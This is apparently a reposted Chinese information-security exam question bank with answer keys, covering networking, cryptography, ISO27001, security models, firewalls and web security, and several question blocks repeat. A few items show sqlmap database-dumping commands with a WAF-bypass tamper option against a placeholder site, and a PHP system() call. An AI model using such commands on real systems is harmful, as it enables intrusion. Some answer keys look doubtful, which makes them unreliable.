当前位置:   article > 正文

[转]信息安全相关理论题(二)_在web开发过程中,与用户相关的重要操作建议采用下列哪项措施。

在web开发过程中,与用户相关的重要操作建议采用下列哪项措施。

27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸
A、 对
B、 错
您的答案: 标准答案: B

28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是
A、 传输层
B、 表示层
C、 会话层
D、 应用层
您的答案: 标准答案: C

29、网络中端口与端口之间连接所用的层是

A、 网络层

B、 表示层

C、 应用层

D、 传输层

您的答案: 标准答案: D

30、IPV4是32位网络地址

A、 对

B、 错

您的答案: 标准答案: A

31、在无线协议里面,能够达到54Mbps/2.4GHz频段的协议类型是

A、 802.11 x

B、 802.11 a

C、 802.11 g

D、 802.11 I

您的答案: 标准答案: C

32、在云技术服务里,支持软件云服务,按权限访问特定应用的技术是

A、 SaaS

B、 IaaS

C、 PaaS

您的答案: 标准答案: A

33、代表非盈利性组织的域名是

A、 COM

B、 ORG

C、 NET

D、 INT

您的答案: 标准答案: B

34、在现代网络中3g网络的频谱能达到1800MHz

A、 对

B、 错

您的答案: 标准答案: B

35、保存着路由器上当前IOS版本的介质是

A、 ROM

B、 RAM

C、 Flash

D、 NVRAM

您的答案: 标准答案: C

36、哪种存储介质掉电后数据不易丢失

A、 ROM

B、 NVRAM

C、 Flash

您的答案: 标准答案: B

37、在CISCO命令行界面中只有一个#的模式表示什么

A、 enable模式

B、 用户模式

C、 配置模式

您的答案: 标准答案: A

38、一般路由器界面中,有两级访问权限,用户级和特权级

A、 对

B、 错

您的答案: 标准答案: A

39、配置默认路由正确的命令是

A、 R1(config-if)#ip route 0.0.0.0 100.0.0.2

B、 R1(config-if)#ip route 0.0.0.0 0.0.0.0 100.0.0.2

C、 R1(config-if)#ip route 100.0.0.2 0.0.0.0

D、 R1(config-if)#ip route 100.0.0.2 0.0.0.0 0.0.0.0

您的答案: 标准答案: B

40、有几个RFC定义了IPsec的核心

A、 一个

B、 两个

C、 三个

D、 四个

您的答案: 标准答案: C

41、当一个路由器接收到发往另一个路由器的内部网络报文时,IPSEC暂不会被启动,只有当传输数据时才会启动

A、 对

B、 错

您的答案: 标准答案: B

42、以下哪种描述是ntdp协议的作用

A、 时间同步

B、 收集网络拓扑信息

C、 网络扫描工具

您的答案: 标准答案: B

43、ACL的作用是什么

A、 控制网络服务质量

B、 访问控制列表

C、 增强内部网关路由协议

D、 地址解析协议

您的答案: 标准答案: B

44、路由器命令中全双工配置命令是

A、 duplex full

B、 duplex auto

C、 duplex half

您的答案: 标准答案: A

45、密码学家对以下属于高频字母的分类是

A、 D,L,U,C,M

B、 P,F,Y,W,G,B,Y

C、 E,T,A,O,N,I,R,S,H

您的答案: 标准答案: C

46、近代密码学的理论主要手段是替代和换位

A、 对

B、 错

您的答案: 标准答案: A

47、密码管理过程中唯一要保护的是

A、 密钥

B、 算法

C、 加密方法

您的答案: 标准答案: A

48、密码学转换技术里的雪崩效应是指

A、 算法用于确保加密过程中不会产生某种模式的随机值。与密钥一同使用,传输时不用加密

B、 与扩散类似,算法输入值轻微的变化会引起输出值的显著变化

C、 明文加密之前对其把明文的最后一个块增加到每一块需要的长度

您的答案: 标准答案: B

49、已知明文攻击的方法是

A、 攻击者选择特定明文发给受害者,待受害者加此明文发送出去后,再截

B、 攻击者拥有一条或多条消息的明文和相对应的密文

C、 通过搜集外部的信息来分析进行攻击

您的答案: 标准答案: B

50、何种加密类型是128位分组,密钥长度可为128,192,256,进行16轮运算

A、 CAST

B、 IDEA

C、 Twofish

您的答案: 标准答案: C

1、针对哈希算法的攻击方式是

A、 暴力攻击

B、 信息载荷

C、 数学分析

您的答案: 标准答案: A

2、消息分组为512位,产生128位的散列值是哪种密码技术

A、 RSA

B、 ECC

C、 MD5

您的答案: 标准答案: C

3、AES算法,要求是分组算法,支持128,192,256密钥长度

A、 对

B、 错

您的答案: 标准答案: A

4、哪种属于业务过程中的无限事件

A、 台风洪水

B、 网络中断

C、 信息损失

D、 交通瘫痪

您的答案: 标准答案: A

5、业务连续性发生中断的时候最大的影响是哪种行业

A、 医疗

B、 能源

C、 媒体

您的答案: 标准答案: B

6、BCP的活动包括哪个

A、 分配责任

B、 物流统计

C、 工程管理

您的答案: 标准答案: A

7、属于业务影响分析的是

A、 BCP

B、 BIA

C、 DRP

D、 ISO

您的答案: 标准答案: B

8、以下哪个是平均故障间隔时间

A、 MTTR

B、 MTBF

C、 MTBD

您的答案: 标准答案: B

9、BCP的策略过程包括建立技能和培训工作,帮助制定各种连续性选项

A、 对

B、 错

您的答案: 标准答案: B

10、包含政策,组织,业务,资源的国际标准是

A、 BCP

B、 BS25999-2

C、 IEC27031

D、 DRI

您的答案: 标准答案: B

11、BS25999是关于什么的标准

A、 英国BSI业务连续性管理

B、 国际协会专业实践

C、 业务连续性有序实践

您的答案: 标准答案: A

12、DRI是用来取代ISO22301国际标准的

A、 对

B、 错

您的答案: 标准答案: B

13、OWASP Mobile Risks里的设备信息未保护是属于哪一项

A、 密码破解

B、 意外的数据泄漏

C、 同过不可信输入进行安全决策

D、 不安全的数据存储

您的答案: 标准答案: D

14、哪种情况属于软件出现开发问题的时候使软件进入冷重启加载

A、 发生一个内核故障,以受控的方式关闭系统

B、 以不受控方式出现之后

C、 一个意外内核或介质故障

您的答案: 标准答案: C

15、在开发安全里,哪种属于软件的脆弱性测试

A、 不得明文方式传送命令数据

B、 内核缺陷

C、 软件的许可问题

您的答案: 标准答案: B

16、在软件开发阶段,安全没有纳入重要考虑因素是安全隐患来源

A、 对

B、 错

您的答案: 标准答案: A

17、数据库模型当中,属于层次数据库的是

A、 组合逻辑树结构中相关联的记录和字段如LDAP

B、 使用属性行和元组列来包含组织信息是广泛的模型

C、 设计为管理多种不同类型的数据

D、 允许每个数据元素用于多个父节点和子记录

您的答案: 标准答案: A

18、哪种是第二代编程语言

A、 机器语言

B、 汇编语言

C、 自然语言

您的答案: 标准答案: B

19、在web开发过程中对于用户要操作重要的操作建议采用

A、 密码要小于6位方便记忆

B、 验证码使用后不要失效

C、 接受短信验证码

您的答案: 标准答案: C

20、确定目标,识别解决风险,开发和测试,计划下次迭代的是哪种开发模型

A、 增量模型

B、 原型模型

C、 螺旋模型

您的答案: 标准答案: C

21、分析和快速设计是增量模型中的一种

A、 对

B、 错

您的答案: 标准答案: B

22、瀑布式模型一般分为几个阶段

A、 4个

B、 3个

C、 2个

D、 1个

您的答案: 标准答案: A

23、传统项目中不包含单元测试

A、 对

B、 错

您的答案: 标准答案: B

24、最好的架构,需求和设计出自于

A、 团队

B、 经理

C、 设计

您的答案: 标准答案: A

25、敏捷不是指下面的哪一种

A、 方法论

B、 价值观

C、 原则

您的答案: 标准答案: A

26、公司治理模型中 COSO 和 Cobit的关系正确的是?

A、 COSO 模型和 CobiT 模型一样重要

B、 CobiT 模型比 COSO 模型重要

C、 COSO 模型比 CobiT 模型重要

D、 COSO 模型是 CobiT 模型的一部分

您的答案: 标准答案: C

27、COSO 是 IT 风险控制模型是否正确?

A、 对

B、 错

您的答案: 标准答案: B

28、在开发过程中,对于已经做过的事情,进行重复性利用,属于CMMI模型中的哪一级?

A、 初始级

B、 已管理级

C、 已定义级

D、 量化管理级

您的答案: 标准答案: B

29、ITIL 模型是一套应用于IT服务管理的实践标准是否正确?

A、 对

B、 错

您的答案: 标准答案: A

30、不属于渗透工程师主要职能的有?

A、 新产品的安全测试

B、 调研要测试目标的信息

C、 修改测试产品出现的错误

D、 出具测试报告及修复方案

您的答案: 标准答案: C

31、CXO 并不需要承担公司法律及业务责任是否正确?

A、 对

B、 错

您的答案: 标准答案: B

32、对企业员工进行安全意识培训属于以下哪一团队职责?

A、 风险管理团队

B、 风险测试团队

C、 风险分析团队

D、 风险评估团队

您的答案: 标准答案: A

33、风险分析团队需要对风险造成的影响和对策的成本之间达到预算平衡的效果,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

34、以下说法错误的是?

A、 信息安全管理员有责任推广企业信息安全策略,给出安全管理指南

B、 信息安全主任委员有权利决策公司安全规划方向

C、 信息安全委员秘书负责组织安拍和召集评审会议、会议记录

D、 信息安全委员秘书可以决策公司安全规划方向

您的答案: 标准答案: D

35、信息安全委员会有权对各部门的资源访问权限做限制,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

36、ISO27001:2005 的内容不包括:

A、 安全方针

B、 访问控制

C、 资产管理

D、 产品发布

您的答案: 标准答案: D

37、ISO27001:2013 标准内容包括14个领域和113个控制措施,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

38、SOA适用性声明ISO27001中提到的物理环境安全不包括以下哪一项?

A、 物理入口控制

B、 密码策略

C、 办公室、房间和设施的安全保护

D、 公共访问、交接区安全

您的答案: 标准答案: B

39、在SOA适用性声明ISO27001中,网络服务的安全属于网络安全管理中的一部分,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

40、以下步骤不属于ISMS模型的有哪一项?

A、 实施所选的控制措施以满足控制目标

B、 对ISMS实施可识别的改进

C、 对项目进行检测、控制

D、 定义ISMS策略、范围

您的答案: 标准答案: C

41、ISMS模型中的 CHECK ,是指定义ISMS策略、范围,是否正确?

A、 对

B、 错

您的答案: 标准答案: B

42、以下属于信息所有者应承担的责任的是?

A、 接受企业风险级别,承担风险首责

B、 策略控制失效首责

C、 监控、分析、变更事项首责

D、 本职工作数据安全责任

您的答案: 标准答案: D

43、员工的工作经历在信息分类中属于隐私信息,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

44、以下属于性能测试的是哪一项?

A、 硬盘性能

B、 虚拟机配置

C、 数据库管理

D、 应用配置

您的答案: 标准答案: A

45、建立策略目录树,可以方便信息安全策略的规划和实施,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

46、以下对SSO验证说法正确的是哪一项?

A、 根据用户已知的内容进行验证,如密码

B、 根据用户拥有的物品进行验证,如钥匙

C、 根据用户身份进行验证,如指纹

D、 通过一个合法授权管理访问多个授权系统

您的答案: 标准答案: D

47、身份验证是一种执行策略,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

48、访问控制模型不包括以下哪一项?

A、 自主访问控制

B、 强制访问控制

C、 角色型访问控制

D、 访客访问控制

您的答案: 标准答案: D

49、Bell-LaPadula 模型中的强星型规则是指,一个主体只能在一个安全级别上执行,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

50、以下不属于技术实践威胁的是?

A、 文档下载

B、 字典攻击

C、 登录欺骗

D、 网络钓鱼

您的答案: 标准答案: A

1、进行密码爆破属于字典攻击,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

2、以下哪项不属于企业安全环境中的物理安全?

A、 配电系统

B、 墙壁和天花板建筑材料

C、 外围组件

D、 钓鱼页面

您的答案: 标准答案: D

3、在企业工作环境物理安全中,墙壁天花板的材料选用、防火等级、承重并不重要,是否正确?

A、 对

B、 错

您的答案: 标准答案: B

4、视频中提到,液体(石油)在火灾级别中属于哪一类?

A、 A类

B、 B类

C、 C类

D、 D类

您的答案: 标准答案: B

5、为了保护计算机和数据要定期对计算机做数据备份,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

6、下面那个选项不是企业信息安全范围三大控制的():

A、 管理控制

B、 物理控制

C、 虚拟控制

D、 技术控制

您的答案: 标准答案: C

7、国际通用CIA准则环境三角那个不是():

A、 保密性

B、 完整性

C、 实践性

D、 可用性

您的答案: 标准答案: C

8、企业信息安全范围三大控制中,管理控制包括风险管理、安全治理、操作安全、法律法规、业务连续行控制和灾难格式计划。()

A、 对

B、 错

您的答案: 标准答案: B

9、下面对安全风险的定义不正确的是():

A、 缺少安全措施的一种缺陷

B、 利用识别脆弱性不会带来安全威胁

C、 显示一个脆弱性的列子

D、 威胁主体利用脆弱性带来的影响

您的答案: 标准答案: B

10、通过资产价值,威胁价值来赋值划分安全等级错误的是():

A、 6,高

B、 4~5,高

C、 1~3,低

D、 4~5,中

您的答案: 标准答案: B

11、信息安全定义属性有风险、暴露、威胁和脆弱性。()

A、 对

B、 错

您的答案: 标准答案: A

12、企业信息框架、信息安全规划所有部门沟通正确的是():

A、 说的一些事情、术语不一样,业务纯利润、保值投资策略,产品,业务无风险

B、 利用信息安全框架模型组织共鸣,来组织有共同的话题、方向和内容

C、 业务一般都理解你技术花在方案上

D、 技术一般都理解业务这个利润的价值和谁在做怎样的事情

您的答案: 标准答案: B

13、根据安全人员架构不是安全职能的是():

A、 安全教育培训

B、 审计部门

C、 执行管理者:CXO

D、 安全管理者:CIO、CISO、CTO

您的答案: 标准答案: A

14、CXO不包括CIO/CISO/CSO/CPO/CTO这些企业安全架构。()

A、 对

B、 错

您的答案: 标准答案: B

15、通用安全模型ISO27001安全属性黄金三角正确的是():

A、 完整性:未授权者能对信息更改

B、 保密性:信息不能泄露给未授权者,确保那些适合的人能访问或看到信息

C、 保密性:信息泄露能给未授权者,也可以访问或看到信息

D、 可用性:用户要求访问使用特性,不用确保授权人在使用信息

您的答案: 标准答案: B

16、通用安全模型ISO27001能给未授权者访问到信息,更改信息和使用信息。()

A、 对

B、 错

您的答案: 标准答案: B

17、企业的安全标准,战术目标说法正确的是():

A、 强制性活动,动作或规划,确保组织机构之间同意方式

B、 违反战术的标准内容

C、 做到和不支持策略的战术工具

D、 所谓的标准不需要满足策略存在的战术工具

您的答案: 标准答案: A

18、下面对措施说法错误的是():

A、 措施不是为项目、计划任务而存在的

B、 为完成步骤,制定的人员,范围,活动

C、 为达到特定目标而执行的详细步骤

D、 措施包括自定完成事情的时间,自定完成任务的时候需要详细阶段与步骤

您的答案: 标准答案: A

19、基准是设定一些标准安全,不能触碰、超越的底线,定义所需要的最低保护级别。()

A、 对

B、 错

您的答案: 标准答案: A

20、指南是为达到特定目标而执行的详细步骤,不便于搭建服务器、中间件和自定文档。()

A、 对

B、 错

您的答案: 标准答案: B

21、主体访问客体步骤正确的是():

A、 身份标识,身份验证,授权,访问资源,问责

B、 用户,授权,程序,系统。

C、 密码短语,密钥,个人身份证(PIN),令牌,访问资源

D、 身份标识,主体凭证,身份验证,授权,问责

您的答案: 标准答案: A

22、访问控制是一种安全手段,主体即一个虚体,客体是被访问信息或被访问实体,访问指主体和客体之间的信息流动。()

A、 对

B、 错

您的答案: 标准答案: B

23、主体和客体之间理解,主动去访问电脑、应用的是主体,被访问的文件、磁盘是客体。()

A、 对

B、 错

您的答案: 标准答案: A

24、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()

A、 对

B、 错

您的答案: 标准答案: A

25、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()

A、 对

B、 错

您的答案: 标准答案: A

26、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()

A、 对

B、 错

您的答案: 标准答案: A

27、TOGAF框架需求管理迭代步骤方法正确的是():

A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构

您的答案: 标准答案: A

28、Zachman企业框架方向和设计都是采用纵横坐标。()

A、 对

B、 错

您的答案: 标准答案: A

29、Zachman模型不是基于人来开发的一个模型框架。()

A、 对

B、 错

您的答案: 标准答案: B

30、SABSA模型内容不包括的层次是():

A、 审计、战略

B、 度量、实施

C、 渗透、防御

D、 概念

您的答案: 标准答案: C

31、SABSA模型纵横坐标定义错误的是():

A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层

B、 横坐标:什么,为什么,过程,谁,地点,时间

C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表

D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序

您的答案: 标准答案: C

32、SABSA模型不是基于安全架构开发的一个模型和方法论。()

A、 对

B、 错

您的答案: 标准答案: B

33、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()

A、 对

B、 错

您的答案: 标准答案: A

34、第一代防火墙技术是基于电路层流量

A、 对

B、 错

您的答案: 标准答案: B

35、数据通过防火墙传输是发生在哪层

A、 会话层

B、 传输层

C、 网络层

D、 链路层

您的答案: 标准答案: C

36、防火墙术语中Trust指的是

A、 源端口

B、 源IP

C、 NAT

D、 DMZ

您的答案: 标准答案: B

37、集成防火墙类似于UTM

A、 对

B、 错

您的答案: 标准答案: A

38、防火墙的简单包过滤工作相关说法正确的是

A、 防火墙会检查数据区是否有恶意数据

B、 防火墙会建立连接状态表用于保持连接

C、 前后报文无关联

D、 防火墙对应用层控制较强

您的答案: 标准答案: C

39、防火墙包过滤规则中,21端口用于FTP数据包的传输

A、 对

B、 错

您的答案: 标准答案: B

40、CPU指令类型包括进程和线程

A、 对

B、 错

您的答案: 标准答案: A

41、分层级设计的操作系统中,0层控制哪方面

A、 应用程序

B、 存储

C、 处理器

D、 进程

您的答案: 标准答案: C

42、微内核架构中,核心在微内核,其它在客户端服务器端

A、 对

B、 错

您的答案: 标准答案: B

43、系统安全架构中属于终端防护的是

A、 主机防火墙

B、 交换机管理

C、 补丁管理

D、 上网监控

您的答案: 标准答案: A

44、操作系统安全保护的核心是系统应用程序及数据库功能

A、 对

B、 错

您的答案: 标准答案: B

45、Linux系统中对文件的权限控制属于哪类信息安全模型

A、 非干扰模型

B、 Biba模型

C、 Clark-Wilson模型

D、 访问矩阵模型

您的答案: 标准答案: D

46、以下哪类模型采用了分层级的设计

A、 信息流模型

B、 中国墙模型

C、 Bell-LaPadula模型

D、 非干扰模型

您的答案: 标准答案: C

47、状态机模型描述了一种无论处于何种状态都是绝对安全的系统

A、 对

B、 错

您的答案: 标准答案: B

48、人在互联网中的角色呈现多样性这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

49、视频中以下哪项不是舆情分析需要的知识储备?

A、 传播学

B、 统计学

C、 心理学

D、 人体力学

您的答案: 标准答案: D

50、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

1、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()

A、 对

B、 错

您的答案: 标准答案: A

2、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()

A、 对

B、 错

您的答案: 标准答案: A

3、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()

A、 对

B、 错

您的答案: 标准答案: A

4、TOGAF框架需求管理迭代步骤方法正确的是():

A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构

您的答案: 标准答案: A

5、Zachman企业框架方向和设计都是采用纵横坐标。()

A、 对

B、 错

您的答案: 标准答案: A

6、Zachman模型不是基于人来开发的一个模型框架。()

A、 对

B、 错

您的答案: 标准答案: B

7、SABSA模型内容不包括的层次是():

A、 审计、战略

B、 度量、实施

C、 渗透、防御

D、 概念

您的答案: 标准答案: C

8、SABSA模型纵横坐标定义错误的是():

A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层

B、 横坐标:什么,为什么,过程,谁,地点,时间

C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表

D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序

您的答案: 标准答案: C

9、SABSA模型不是基于安全架构开发的一个模型和方法论。()

A、 对

B、 错

您的答案: 标准答案: B

10、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()

A、 对

B、 错

您的答案: 标准答案: A

11、第一代防火墙技术是基于电路层流量

A、 对

B、 错

您的答案: 标准答案: B

12、数据通过防火墙传输是发生在哪层

A、 会话层

B、 传输层

C、 网络层

D、 链路层

您的答案: 标准答案: C

13、防火墙术语中Trust指的是

A、 源端口

B、 源IP

C、 NAT

D、 DMZ

您的答案: 标准答案: B

14、集成防火墙类似于UTM

A、 对

B、 错

您的答案: 标准答案: A

15、防火墙的简单包过滤工作相关说法正确的是

A、 防火墙会检查数据区是否有恶意数据

B、 防火墙会建立连接状态表用于保持连接

C、 前后报文无关联

D、 防火墙对应用层控制较强

您的答案: 标准答案: C

16、防火墙包过滤规则中,21端口用于FTP数据包的传输

A、 对

B、 错

您的答案: 标准答案: B

17、CPU指令类型包括进程和线程

A、 对

B、 错

您的答案: 标准答案: A

18、分层级设计的操作系统中,0层控制哪方面

A、 应用程序

B、 存储

C、 处理器

D、 进程

您的答案: 标准答案: C

19、微内核架构中,核心在微内核,其它在客户端服务器端

A、 对

B、 错

您的答案: 标准答案: B

20、系统安全架构中属于终端防护的是

A、 主机防火墙

B、 交换机管理

C、 补丁管理

D、 上网监控

您的答案: 标准答案: A

21、操作系统安全保护的核心是系统应用程序及数据库功能

A、 对

B、 错

您的答案: 标准答案: B

22、Linux系统中对文件的权限控制属于哪类信息安全模型

A、 非干扰模型

B、 Biba模型

C、 Clark-Wilson模型

D、 访问矩阵模型

您的答案: 标准答案: D

23、以下哪类模型采用了分层级的设计

A、 信息流模型

B、 中国墙模型

C、 Bell-LaPadula模型

D、 非干扰模型

您的答案: 标准答案: C

24、状态机模型描述了一种无论处于何种状态都是绝对安全的系统

A、 对

B、 错

您的答案: 标准答案: B

25、人在互联网中的角色呈现多样性这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

26、视频中以下哪项不是舆情分析需要的知识储备?

A、 传播学

B、 统计学

C、 心理学

D、 人体力学

您的答案: 标准答案: D

27、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

28、企业和政府中的舆情分析体系包括信息监测这个环节吗?

A、 对

B、 错

您的答案: 标准答案: A

29、在进行舆情事件分析时首先考量的是所在组织的利害关系这个说法对吗

A、 对

B、 错

您的答案: 标准答案: A

30、在案例中相关企业应当快速回应避免对品牌造成伤害这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

31、监测系统的作用在于海量信息的筛选这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: A

32、舆情分析工作中可以根据情况自己进行决策执行这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

33、研究舆情事件中参与者的身份构成重要吗

A、 对

B、 错

您的答案: 标准答案: A

34、下面哪些步骤是舆情管理中不必要的?

A、 舆情分析

B、 组织协同

C、 事后总结

D、 事件处理

您的答案: 标准答案: C

35、组织在舆情事件出现后的协同要根据组织架构中各个部分的职责和职能进行协同这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

36、单个维权和群体维权对于舆情工作的区别只是在于数量这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

37、这次事件后国家食品药品监督管理总局针对社会关心的疫苗安全问题发布科普知识予以回应,这是一种舆情处理吗?

A、 对

B、 错

您的答案: 标准答案: A

38、课程中的组织设计的管理考核是指划定舆情工作任务量化目标这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: A

39、管理者除了对舆情部门的管理还必须包括对自身信息的管理这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

40、领导能力只包括政策解读和决策对应两种能力这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: B

41、分析研判包括对信息产生的后果的预测这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

42、舆情工作的技术环节重点在于信息的收集和过滤这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

43、视频中从哪个角度分析网民对快播案件的态度?

A、 法律

B、 网民结构

C、 道德

D、 互联网发展

您的答案: 标准答案: B

44、视频中提出的分析报告中网民主要的年龄段是多少?

A、 0-5

B、 6-17

C、 18-25

D、 25-35

您的答案: 标准答案: C

45、网站登记备案归以下哪个部门管理?

A、 公安部

B、 网信办

C、 宣传部

D、 国安部

您的答案: 标准答案: B

46、监测系统的最终目标在于什么?

A、 关键字监测

B、 敏感词发现

C、 内容分析

D、 提高效率

您的答案: 标准答案: D

47、关键字监测和敏感词发现的目的在于过滤不相关信息这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

48、棱镜计划是只收集美国公民手机的隐私数据这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

49、监测系统用户管理中的审批功能是为了保障信息安全这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: A

50、监测系统的重点在于信息收集能力,而不在于信息关联能力这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: B

1、如何使用sqlmap自带的绕过脚本?

A、 sqlmap.py -u “http://xxx.com/index.php?id=1” --dbs

B、 sqlmap.py -u “http://xxx.com/index.php” --data “id=1” --dbs

C、 sqlmap.py -u “http://xxx.com/index.php?id=1” -v 3 --tamper “xxx.py” --dbs

D、 sqlmap.py -u “http://xxxx.com/index.php” --cookie “id=1” --level 2 --dbs

您的答案: 标准答案: C

2、下列哪项不是文件信息泄露的途径?

A、 网站目录备份

B、 默认的网站数据库文件

C、 网站提供的上传功能

D、 第三方源代码管理

您的答案: 标准答案: C

3、下列关于Windows权限的继承,说法不当的是?

A、 新建的子文件夹和文件会继承上一级目录的权限

B、 根目录下的文件夹或文件继承磁盘分区的权限

C、 下级目录可以拒绝继承上级权限

D、 默认子目录不继承上一级目录权限

您的答案: 标准答案: D

4、下列Backup Operators组权限中,说法错误的是?

A、 从网络访问此计算机

B、 调整进程的内存分配

C、 允许本地登录

D、 关闭系统

您的答案: 标准答案: B

5、下列哪个工具可以造成局域网网络瘫痪?

A、 namp

B、 sqlmap

C、 arpspoof

D、 zaproxy

您的答案: 标准答案: C

6、下列解决“Zip炸弹”的办法中有效的是?

A、 限制文件大小和类型

B、 限制文件内容

C、 限制文件名称

D、 限制文件路径

您的答案: 标准答案: A

7、下列关于JAVA序列化机制的说法错误的是?

A、 包含系统资源的直接句柄和相对地址空间信息的字段不被声明为transient,该对象在序列化状态下可能会被修改

B、 保护虚拟机外的字节流的另一方式是对序列化包产生的流进行加密

C、 字节流加密防止解码或读取被序列化的对象的私有状态

D、 对象流就是将对象的内容进行流化,不可以对流化后的对象进行读写操作

您的答案: 标准答案: D

8、下列关于浏览器刷新和转到的说法错误的是?

A、 刷新检查时会保留之前的一些变量的值

B、 刷新浏览器取网页的新内容来更新本机缓存

C、 转到是浏览器会使用已经存于本机中的缓存

D、 转到使用本机中的缓存文件,同时保留之前的变量

您的答案: 标准答案: D

9、FileReader.read方法返回值的取值范围是____。

A、 0-127

B、 1-128

C、 0-255

D、 0-65535

您的答案: 标准答案: D

10、下列选项在样式表中会被浏览器忽略的____。

A、 /

B、 *

C、 //

D、 /**/

您的答案: 标准答案: D

11、CSS属性可以是元素固有的属性但不可以是自定义的属性。

A、 正确

B、 错误

您的答案: 标准答案: B

12、下面关于web组件的描述不正确的是____。

A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架

B、 不同的web开发框架开发出的web应用功能也不同

C、 存储包括数据库存储、文件存储、内存存储

D、 目前最主流的web容器是Apache

您的答案: 标准答案: B

13、CSS属性可以是元素固有的属性但不可以是自定义的属性。

A、 正确

B、 错误

您的答案: 标准答案: B

14、下列代码<img/src="ichunqiu.png"alt=“ichunqiu”> <img/’>能够被

A、 IE6

B、 IE7

C、 IE8

D、 IE9

您的答案: 标准答案: A

15、下列选项在样式表中会被浏览器忽略的是?

A、 /

B、 *

C、 //

D、 /**/

您的答案: 标准答案: D

16、下列选项是firebug中控制台命令行输入开头符号的是?

A、 :

B、 ~

C、 //

D、 >

您的答案: 标准答案: D

17、FileReader.read方法返回值的取值范围是?

A、 0-127

B、 1-128

C、 0-255

D、 0-65535

您的答案: 标准答案: D

18、InputStream.read返回值为____,作为读取流结束标志。

A、 true

B、 false

C、 -1

D、 1

您的答案: 标准答案: C

19、下面关于web组件的描述不正确的是____。

A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架

B、 不同的web开发框架开发出的web应用功能也不同

C、 存储包括数据库存储、文件存储、内存存储

D、 目前最主流的web容器是Apache

您的答案: 标准答案: B

20、下列在执行完exp后获取cmd的shell应该输入____命令。

A、 system

B、 cmd

C、 whoami

D、 shell

您的答案: 标准答案: D

21、下列中容易被xss窃取账号信息的是____。

A、 不轻易访问陌生链接

B、 使用无线网络应注意自己是否被劫持

C、 发现网站中存在xss告知网站客服

D、 直接打开并登录别人发的网址

您的答案: 标准答案: D

22、下列插件中,具有代理功能的是:

A、 Hackbar

B、 FoxyProxy

C、 ModifyHeaders

D、 ShowIP

您的答案: 标准答案: B

23、下列软件中,是源代码审计工具的是:

A、 PCHunter

B、 WebShellKill

C、 AZServerTool

D、 Seay审计工具

您的答案: 标准答案: D

24、php.ini 是___配置文件:

A、 全局

B、 当前文件夹

C、 指定文件夹

D、 指定文件

您的答案: 标准答案: A

25、在php配置文件,设置short_open_tag =On的意思是:

A、 启用全局变量

B、 关闭全局变量

C、 启用短标签

D、 关闭短标签

您的答案: 标准答案: C

26、开启php安全模式后,下列哪个代码无法正常执行:

A、 <?php echo “Hello World”; ?>

B、 <?php phpinfo()?>

C、 <?php system(‘whoami’)?;>

D、 <?phpinfo();?>

您的答案: 标准答案: C

27、在php.ini中设置allow_url_include=off后,网站程序能够包含远程文件

A、 对

B、 错

您的答案: 标准答案: B

28、下列php函数属于危险函数的是:

A、 echo

B、 eval

C、 levenshtein

D、 php_check_syntax

您的答案: 标准答案: B

29、下列函数中,不属于包含函数的是:

A、 require

B、 include

C、 include_once

D、 levenshtein

